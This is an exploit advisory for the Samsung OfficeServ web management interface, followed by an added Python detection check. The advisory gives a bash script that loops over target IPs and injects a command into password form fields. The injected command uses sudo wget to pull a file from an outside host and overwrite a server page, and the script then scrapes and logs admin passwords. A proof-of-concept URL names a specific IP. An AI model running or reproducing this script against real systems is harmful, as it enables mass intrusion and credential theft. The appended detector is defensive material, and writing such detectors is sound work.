Samsung Officeserv Read the users/passwords

2013-05-10 / 2013-05-11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title:samsung officeserv Read the users/passwords
# Author: MaDo Mokhtar
# Contact: codezeroooo[at]yahoo[dot]com
# Vendor: http://www.samsung.com
# Version: Web Management V 4.12th 2010.04

- Introduction:
This converged communication system provides voice, data, wireline, and wireless solutions. Combining its expertise in wireless, communications, core networks, digital technology and IP functionality, Samsung brings you the OfficeServ converged communication system. As a completely converged platform, OfficeServ supports both voice and data communication with powerful, IP-based wired and wireless flexibility.

- Vulnerability Explanation:
some coders are so stupid. They save the usernames and passwords in text files, UNPROTECTED.

- Vulnerable Code Snippet at /contents/general/passwd/passmg.php

- Proof of Concept:
https://201.192.234.66/contents/general/passwd/passmg.php
https://[ip]/contents/general/passwd/passmg.php

Bash script to grep the password
=====================
#! /bin/bash
filecon=(` cat $1 `)
for ip in "${filecon[@]}"
do
echo $ip
curl -m3 --insecure --data "sSMELoginID=admin&action=save&passwd1=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php&passwd2=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php" https://${ip}/login/myinfo.php >> tmp.tmp
res=$(curl -m3 --insecure https://${ip}/contents/general/passwd/passmg.php | grep old_passwd_0 | cut -d'"' -f6)
echo $res
echo "found: "${ip}" >> admin <> "$res" <<" >> foserv.res
done

- Credits: MaDo Mokhtar
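A detection check for the two request patterns in the proof of concept above, written as an added example and not part of the original advisory or any Samsung code. It assumes a reverse proxy or WAF in front of the management interface that can hand over the method, path, form body and a hypothetical `authenticated` flag for each request; the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs

# Paths and field names taken from the advisory's proof of concept.
LOGIN_PATH = "/login/myinfo.php"
PASSWD_PAGE = "/contents/general/passwd/passmg.php"
PASSWORD_FIELDS = ("passwd1", "passwd2")

# Characters that let a form value break out into a shell command line.
# Strict on purpose: a password containing one of these is also flagged.
SHELL_META = re.compile(r"[;&|`$<>\\\n]")


def inspect_request(method, path, body="", authenticated=False):
    """Return a list of findings for one proxied request.

    `authenticated` is an assumed flag supplied by the proxy (hypothetical).
    """
    findings = []
    if method == "POST" and path == LOGIN_PATH:
        # parse_qs decodes '+' and %XX, so encoded metacharacters are visible.
        form = parse_qs(body, keep_blank_values=True)
        for field in PASSWORD_FIELDS:
            if any(SHELL_META.search(v) for v in form.get(field, [])):
                findings.append(f"shell metacharacter in {field}")
    if path == PASSWD_PAGE and not authenticated:
        findings.append("unauthenticated access to password page")
    return findings


# Constructed sample requests: (method, path, body, authenticated).
SAMPLE_REQUESTS = [
    ("POST", LOGIN_PATH,
     "sSMELoginID=admin&action=save&passwd1=any+%26%26+id&passwd2=any+%26%26+id",
     False),
    ("POST", LOGIN_PATH,
     "sSMELoginID=admin&action=save&passwd1=Tr0ub4dor3&passwd2=Tr0ub4dor3",
     True),
    ("GET", PASSWD_PAGE, "", False),
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[0], request[1], inspect_request(*request))
```
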


Copyright 2024, cxsecurity.com